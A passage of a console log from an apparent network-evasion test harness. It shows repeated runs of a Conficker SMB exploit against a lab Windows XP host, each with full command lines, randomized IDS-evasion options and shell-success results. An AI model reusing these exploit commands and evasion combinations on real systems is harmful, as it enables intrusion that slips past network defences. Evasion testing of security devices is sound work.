  415. Info: CommandShell::SendCommand() - Failed to send string
  416. Info: Shell closed
  417. 0: Success.
  418. Pid 28126 timed out - killed
  419. 2015-06-07 23:24:47 INFO
  420. Timed out (10.62.90.111):
  421. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14218 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=UylDA10TeNQ --evasion=[netbios_connect,smb_opentree]ipv4_frag,"904" --evasion=[smb_connect,msrpc_req]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  422. Info: Using random seed UylDA10TeNR
  423. The following evasions are applied from stage netbios_connect to smb_opentree:
  424. - IPv4 fragments with at most 904 bytes per fragment
  425. The following evasions are applied from stage smb_connect to msrpc_req:
  426. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  427. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  428. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  429.  
  430. Info: NetBIOS connection 10.62.90.111:14218 -> 10.35.1.207:445
  431. Terminated
  432. ....
  433. 715 runs averaging 2.25 runs / second ; progress: 318/43200........2015-06-07 23:24:51 INFO
  434. Success. (10.62.90.112):
  435. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13004 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=2GjOOsvsIIQ --evasion=[smb_openpipe,end]smb_writeandxpad,"2","random" --evasion=[msrpc_bind,end]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
  436. Info: Using random seed 2GjOOsvsIIT
  437. The following evasions are applied from stage smb_openpipe to end:
  438. - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  439. The following evasions are applied from stage msrpc_bind to end:
  440. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  441.  
  442. Info: NetBIOS connection 10.62.90.112:13004 -> 10.35.1.207:445
  443. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  444. Info: Sending MSRPC request with exploit
  445. Info: Shell found, attack succeeded
  446. Info: Shell closed
  447. 0: Success.
  448. ...
  449. 727 runs averaging 2.25 runs / second ; progress: 323/43200.....Pid 28669 timed out - killed
  450. 2015-06-07 23:24:57 INFO
  451. Timed out (10.62.90.115):
  452. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12771 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=kfbuWD4P89g --evasion=[netbios_connect,msrpc_req]ipv4_frag,"80" --evasion=[smb_opentree,msrpc_req]tcp_paws,"2","3","alpharandomized" --evasion=[msrpc_req,end]tcp_paws,"2","176664122","alphanumrandomized" --verifydelay=1000 --payload=shell
  453. Info: Using random seed kfbuWD4P89i
  454. The following evasions are applied from stage netbios_connect to msrpc_req:
  455. - IPv4 fragments with at most 80 bytes per fragment
  456. The following evasions are applied from stage smb_opentree to msrpc_req:
  457. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
  458. The following evasions are applied from stage msrpc_req to end:
  459. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 176664122> and has original payload with alphanumeric bytes randomized
  460.  
  461. Info: NetBIOS connection 10.62.90.115:12771 -> 10.35.1.207:445
  462. Terminated
  463. ..
  464. 735 runs averaging 2.24 runs / second ; progress: 328/43200.......
  465. 742 runs averaging 2.23 runs / second ; progress: 333/43200....Pid 29029 timed out - killed
  466. 2015-06-07 23:25:05 INFO
  467. Timed out (10.62.90.114):
  468. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28770 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=XiG22AlNIMY --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
  469. Info: Using random seed XiG22AlNIMZ
  470. The following evasions are applied from stage smb_connect to msrpc_bind:
  471. - TCP timestamps echo reply value is sent in the wrong endianness
  472. The following evasions are applied from stage smb_opentree to msrpc_req:
  473. - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
  474.  
  475. Info: NetBIOS connection 10.62.90.114:28770 -> 10.35.1.207:445
  476. Terminated
  477. .........
  478. 756 runs averaging 2.24 runs / second ; progress: 338/43200..............
  479. 770 runs averaging 2.24 runs / second ; progress: 343/43200..............
  480. 784 runs averaging 2.25 runs / second ; progress: 348/43200............
  481. 796 runs averaging 2.25 runs / second ; progress: 353/43200........
  482. 804 runs averaging 2.24 runs / second ; progress: 358/43200......
  483. 810 runs averaging 2.23 runs / second ; progress: 363/432002015-06-07 23:25:34 INFO
  484. Success. (10.62.90.118):
  485. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47572 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=0nVUQix4y/E --evasion=[smb_opentree,end]tcp_chaff,"2","nullchksum|nullflag|shorthdr","unmodified" --evasion=[netbios_connect,end]tcp_paws,"50%","8","alpharandomized" --verifydelay=1000 --payload=shell
  486. Info: Using random seed 0nVUQix4y/H
  487. The following evasions are applied from stage netbios_connect to end:
  488. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
  489. The following evasions are applied from stage smb_opentree to end:
  490.  
  491.  
  492. Info: NetBIOS connection 10.62.90.118:47572 -> 10.35.1.207:445
  493. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  494. Info: Sending MSRPC request with exploit
  495. Info: Shell found, attack succeeded
  496. Info: Shell closed
  497. 0: Success.
  498. ..
  499. 813 runs averaging 2.21 runs / second ; progress: 368/43200......
  500. 819 runs averaging 2.19 runs / second ; progress: 373/43200Pid 30108 timed out - killed
  501. 2015-06-07 23:25:43 INFO
  502. Timed out (10.62.90.116):
  503. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63115 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=C7Gx0UPKlVk --evasion=[smb_opentree,msrpc_req]tcp_chaff,"8","nullchksum|nullflag|outofwindow","random_alpha" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  504. Info: Using random seed C7Gx0UPKlVk
  505. The following evasions are applied from stage smb_opentree to msrpc_req:
  506. - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
  507. * NULL TCP checksum.
  508. * NULL TCP control flags.
  509. * An out-of-window sequence number.
  510. * Duplicate packet has random alpha bytes as payload
  511. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  512. - 75% probability to add a random urgent data byte to a TCP segment.
  513.  
  514. Info: NetBIOS connection 10.62.90.116:63115 -> 10.35.1.207:445
  515. Terminated
  516. ..Pid 30138 timed out - killed
  517. 2015-06-07 23:25:45 INFO
  518. Timed out (10.62.90.110):
  519. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15702 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=M+TbVWpf7Lc --evasion=[msrpc_bind,end]tcp_paws,"50%","4","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
  520. Info: Using random seed M+TbVWpf7Lc
  521. The following evasions are applied from stage smb_openpipe to end:
  522. - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
  523. The following evasions are applied from stage msrpc_bind to end:
  524. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 0x00 bytes as payload
  525.  
  526. Info: NetBIOS connection 10.62.90.110:15702 -> 10.35.1.207:445
  527. Terminated
  528. ...........
  529. 834 runs averaging 2.20 runs / second ; progress: 379/43200...........
  530. 845 runs averaging 2.20 runs / second ; progress: 384/43200......
  531. 851 runs averaging 2.19 runs / second ; progress: 389/43200.
  532. 852 runs averaging 2.16 runs / second ; progress: 394/43200.......
  533. 859 runs averaging 2.16 runs / second ; progress: 399/43200..............
  534. 873 runs averaging 2.16 runs / second ; progress: 404/43200......
  535. 879 runs averaging 2.15 runs / second ; progress: 409/43200
  536. 879 runs averaging 2.12 runs / second ; progress: 414/43200.....
  537. 884 runs averaging 2.11 runs / second ; progress: 419/43200.............
  538. 897 runs averaging 2.12 runs / second ; progress: 424/43200.....2015-06-07 23:26:37 INFO
  539. Success. (10.62.90.112):
  540. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56392 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=jxeAP58CYIU --evasion=[start,end]ipv4_opt,"2","inc","zero" --evasion=[netbios_connect,end]tcp_paws,"2","268435455","random_alpha" --evasion=[msrpc_bind,end]tcp_seg,"5" --verifydelay=1000 --payload=shell
  541. Info: Using random seed jxeAP58CYIW
  542. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  543. The duplicate packet has NULL bytes for payload
  544. The following evasions are applied from stage netbios_connect to end:
  545. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  546. The following evasions are applied from stage msrpc_bind to end:
  547. - TCP packets are segmented to contain at most 5 bytes of payload.
  548.  
  549. Info: NetBIOS connection 10.62.90.112:56392 -> 10.35.1.207:445
  550. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  551. Info: Sending MSRPC request with exploit
  552. Info: Shell found, attack succeeded
  553. Info: CommandShell::SendCommand() - Failed to send string
  554. Info: Command shell connection reset.
  555. Info: Shell closed
  556. 0: Success.
  557. ..
  558. 905 runs averaging 2.11 runs / second ; progress: 429/43200.......2015-06-07 23:26:43 INFO
  559. Success. (10.62.90.110):
  560. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31587 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5heyJRsjnD8 --evasion=[start,smb_openpipe]tcp_chaff,"3","nullchksum|nullflag|outofwindow|longhdr","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"75%","268435455","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435454","alpharandomized" --verifydelay=1000 --payload=shell
  561. Info: Using random seed 5heyJRsjnD/
  562. The following evasions are applied from stage start to smb_openpipe:
  563. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  564. * NULL TCP checksum.
  565. * NULL TCP control flags.
  566. * An out-of-window sequence number.
  567. * TCP header longer than packet total size
  568. * Duplicate packet has random alphanumeric bytes as payload
  569. The following evasions are applied from stage smb_opentree to smb_openpipe:
  570. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
  571. The following evasions are applied from stage smb_openpipe to msrpc_req:
  572. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
  573.  
  574. Info: NetBIOS connection 10.62.90.110:31587 -> 10.35.1.207:445
  575. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  576. Info: Sending MSRPC request with exploit
  577. Info: Shell found, attack succeeded
  578. Info: Command shell connection reset.
  579. Info: CommandShell::SendCommand() - Failed to send string
  580. Info: Shell closed
  581. 0: Success.
  582. .
  583. 914 runs averaging 2.11 runs / second ; progress: 434/43200....2015-06-07 23:26:46 INFO
  584. Success. (10.62.90.118):
  585. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22932 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ZNjKCYBz1U8 --evasion=[smb_connect,smb_opentree]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"7","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
  586. Info: Using random seed ZNjKCYBz1U9
  587. The following evasions are applied from stage smb_connect to smb_opentree:
  588. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  589. The duplicate packet has identical payload except that alphabetic characters are randomized
  590. The following evasions are applied from stage smb_openpipe to msrpc_req:
  591. - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  592.  
  593. Info: NetBIOS connection 10.62.90.118:22932 -> 10.35.1.207:445
  594. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  595. Info: Sending MSRPC request with exploit
  596. Info: Shell found, attack succeeded
  597. Info: Shell closed
  598. 0: Success.
  599. ....
  600. 923 runs averaging 2.10 runs / second ; progress: 439/43200...
  601. 926 runs averaging 2.09 runs / second ; progress: 444/43200.....
  602. 931 runs averaging 2.07 runs / second ; progress: 449/43200.....
  603. 936 runs averaging 2.06 runs / second ; progress: 454/43200.......
  604. 943 runs averaging 2.06 runs / second ; progress: 459/43200...........
  605. 954 runs averaging 2.06 runs / second ; progress: 464/432002015-06-07 23:27:14 INFO
  606. Success. (10.62.90.116):
  607. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45379 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PKDFLu3szoA --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"5","1","7","random" --evasion=[msrpc_bind,end]tcp_paws,"75%","236472573","alphanumrandomized" --verifydelay=1000 --payload=shell
  608. Info: Using random seed PKDFLu3szoA
  609. The following evasions are applied from stage smb_connect to smb_openpipe:
  610. - Before normal SMB writes, 5 SMB trees are opened and 1 writes are performed to them. The write payload is 7 random bytes.
  611. The following evasions are applied from stage msrpc_bind to end:
  612. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 236472573> and has original payload with alphanumeric bytes randomized
  613.  
  614. Info: NetBIOS connection 10.62.90.116:45379 -> 10.35.1.207:445
  615. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  616. Info: Sending MSRPC request with exploit
  617. Info: Shell found, attack succeeded
  618. Info: CommandShell::SendCommand() - Failed to send string
  619. Info: Command shell connection reset.
  620. Info: Shell closed
  621. 0: Success.
  622. .......
  623. 962 runs averaging 2.05 runs / second ; progress: 469/43200........
  624. 970 runs averaging 2.05 runs / second ; progress: 474/43200..
  625. 972 runs averaging 2.03 runs / second ; progress: 479/43200......2015-06-07 23:27:31 INFO
  626. Success. (10.62.90.112):
  627. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18684 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=FSkveGjBNE0 --evasion=[smb_connect,smb_opentree]netbios_chaff,"75%","empty_unspec|empty_keepalive|small_unspec|http_post|msrpc_req|broken_length" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","4","8","random_msrpcbind" --verifydelay=1000 --payload=shell
  628. Info: Using random seed FSkveGjBNE0
  629. The following evasions are applied from stage smb_connect to smb_opentree:
  630. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  631. The following evasions are applied from stage msrpc_bind to msrpc_req:
  632. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  633.  
  634. Info: NetBIOS connection 10.62.90.112:18684 -> 10.35.1.207:445
  635. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  636. Info: Sending MSRPC request with exploit
  637. Info: Shell found, attack succeeded
  638. Info: CommandShell::SendCommand() - Failed to send string
  639. Info: Command shell connection reset.
  640. Info: Shell closed
  641. 0: Success.
  642. ....
  643. 983 runs averaging 2.03 runs / second ; progress: 484/43200.................
  644. 1000 runs averaging 2.05 runs / second ; progress: 489/43200........
  645. 1008 runs averaging 2.04 runs / second ; progress: 494/43200...........
  646. 1019 runs averaging 2.04 runs / second ; progress: 499/43200.........
  647. 1028 runs averaging 2.04 runs / second ; progress: 504/43200Pid 32180 timed out - killed
  648. 2015-06-07 23:27:54 INFO
  649. Timed out (10.62.90.117):
  650. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30975 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LxaXqpswT/A --evasion=[start,end]tcp_inittsopt,"disable","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  651. Info: Using random seed LxaXqpswT/A
  652. - TCP timestamps are disabled.
  653. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  654. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  655.  
  656. Info: NetBIOS connection 10.62.90.117:30975 -> 10.35.1.207:445
  657. Terminated
  658. ..........2015-06-07 23:27:57 INFO
  659. Success. (10.62.90.117):
  660. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63794 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FUtkY7DTvvk --evasion=[smb_connect,msrpc_req]ipv4_opt,"75%","inc","zero" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","248964565","shuffle" --verifydelay=1000 --payload=shell
  661. Info: Using random seed FUtkY7DTvvk
  662. The following evasions are applied from stage netbios_connect to msrpc_req:
  663. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248964565> and has shuffled original payload
  664. The following evasions are applied from stage smb_connect to msrpc_req:
  665. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  666. The duplicate packet has NULL bytes for payload
  667.  
  668. Info: NetBIOS connection 10.62.90.117:63794 -> 10.35.1.207:445
  669. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  670. Info: Sending MSRPC request with exploit
  671. Info: Shell found, attack succeeded
  672. Info: CommandShell::SendCommand() - Failed to send string
  673. Info: Command shell connection reset.
  674. Info: Shell closed
  675. 0: Success.
  676. .....
  677. 1045 runs averaging 2.05 runs / second ; progress: 509/43200.........2015-06-07 23:28:03 INFO
  678. Success. (10.62.90.117):
  679. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11579 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=T9gQkNxSf1A --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","210110311","alphanumrandomized" --evasion=[netbios_connect,smb_connect]tcp_seg,"8" --verifydelay=1000 --payload=shell
  680. Info: Using random seed T9gQkNxSf1B
  681. The following evasions are applied from stage netbios_connect to smb_connect:
  682. - TCP packets are segmented to contain at most 8 bytes of payload.
  683. The following evasions are applied from stage smb_openpipe to msrpc_req:
  684. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 210110311> and has original payload with alphanumeric bytes randomized
  685.  
  686. Info: NetBIOS connection 10.62.90.117:11579 -> 10.35.1.207:445
  687. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  688. Info: Sending MSRPC request with exploit
  689. Info: Shell found, attack succeeded
  690. Info: CommandShell::SendCommand() - Failed to send string
  691. Info: Command shell connection reset.
  692. Info: Shell closed
  693. 0: Success.
  694. .
  695. 1056 runs averaging 2.05 runs / second ; progress: 514/43200.....
  696. 1061 runs averaging 2.04 runs / second ; progress: 519/43200...2015-06-07 23:28:13 INFO
  697. Success. (10.62.90.117):
  698. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14967 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=pKBgcpQw7jU --evasion=[start,msrpc_req]tcp_paws,"3","4","random_alpha" --evasion=[netbios_connect,end]tcp_timewait,"9","random_alphanum" --verifydelay=1000 --payload=shell
  699. Info: Using random seed pKBgcpQw7jW
  700. The following evasions are applied from stage start to msrpc_req:
  701. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alpha bytes as payload
  702. The following evasions are applied from stage netbios_connect to end:
  703. - 9 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alphanumeric bytes as payload
  704.  
  705. Info: NetBIOS connection 10.62.90.117:14967 -> 10.35.1.207:445
  706. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  707. Info: Sending MSRPC request with exploit
  708. Info: Shell found, attack succeeded
  709. Info: Shell closed
  710. 0: Success.
  711.  
  712. 1065 runs averaging 2.03 runs / second ; progress: 524/43200...........
  713. 1076 runs averaging 2.03 runs / second ; progress: 529/43200...........
  714. 1087 runs averaging 2.04 runs / second ; progress: 534/43200.....
  715. 1092 runs averaging 2.03 runs / second ; progress: 539/43200...Pid 374 timed out - killed
  716. 2015-06-07 23:28:32 INFO
  717. Timed out (10.62.90.113):
  718. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57743 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nx9xO19TZJk --evasion=[smb_connect,smb_opentree]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  719. Info: Using random seed nx9xO19TZJm
  720. The following evasions are applied from stage smb_connect to smb_opentree:
  721. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  722. The duplicate packet has random alphanumeric bytes as payload
  723. The following evasions are applied from stage smb_connect to end:
  724. - 25% probability to add a zero urgent data byte to a TCP segment.
  725.  
  726. Info: NetBIOS connection 10.62.90.113:57743 -> 10.35.1.207:445
  727. Terminated
  728. .....
  729. 1101 runs averaging 2.02 runs / second ; progress: 544/43200...........2015-06-07 23:28:38 INFO
  730. Success. (10.62.90.113):
  731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29873 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=1DXgDuqehjs --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"1023","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","alphanumrandomized" --verifydelay=1000 --payload=shell
  732. Info: Using random seed 1DXgDuqehjv
  733. The following evasions are applied from stage smb_opentree to smb_openpipe:
- 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.113:29873 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...
1116 runs averaging 2.03 runs / second ; progress: 549/43200...........
1127 runs averaging 2.03 runs / second ; progress: 554/43200...
1130 runs averaging 2.02 runs / second ; progress: 559/43200........
1138 runs averaging 2.02 runs / second ; progress: 564/43200......
1144 runs averaging 2.01 runs / second ; progress: 569/43200......
1150 runs averaging 2.00 runs / second ; progress: 574/43200....
1154 runs averaging 1.99 runs / second ; progress: 579/43200..........
1164 runs averaging 1.99 runs / second ; progress: 584/43200.....
1169 runs averaging 1.98 runs / second ; progress: 589/43200
1169 runs averaging 1.97 runs / second ; progress: 594/43200
1169 runs averaging 1.95 runs / second ; progress: 599/43200.....
1174 runs averaging 1.94 runs / second ; progress: 604/43200..2015-06-07 23:29:35 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49313 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4tABlTwo17Y --evasion=[smb_openpipe,msrpc_bind]smb_writeandxpad,"9","random" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"5","new","zero" --evasion=[start,end]tcp_paws,"1","6","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed 4tABlTwo17b
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- 9 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.

Info: NetBIOS connection 10.62.90.112:49313 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.........
1186 runs averaging 1.95 runs / second ; progress: 609/43200......
1192 runs averaging 1.94 runs / second ; progress: 614/43200.......
1199 runs averaging 1.94 runs / second ; progress: 619/43200..Pid 1385 timed out - killed
2015-06-07 23:29:50 INFO
Timed out (10.62.90.119):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39203 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/6+woTIRZQ --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
Info: Using random seed d/6+woTIRZR
The following evasions are applied from stage smb_opentree to msrpc_bind:
- TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- Add a zero urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.119:39203 -> 10.35.1.207:445
Terminated
..2015-06-07 23:29:52 INFO
Success. (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26962 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=JpRj3RSvUgQ --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","7","2","random_msrpcbind" --evasion=[start,netbios_connect]tcp_paws,"5","208562135","alpharandomized" --evasion=[start,msrpc_bind]tcp_paws,"8","203623296","shuffle" --verifydelay=1000 --payload=shell
Info: Using random seed JpRj3RSvUgQ
The following evasions are applied from stage start to netbios_connect:
- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208562135> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage start to msrpc_bind:
- Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 203623296> and has shuffled original payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- Before normal SMB writes, 5 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.

Info: NetBIOS connection 10.62.90.113:26962 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
....
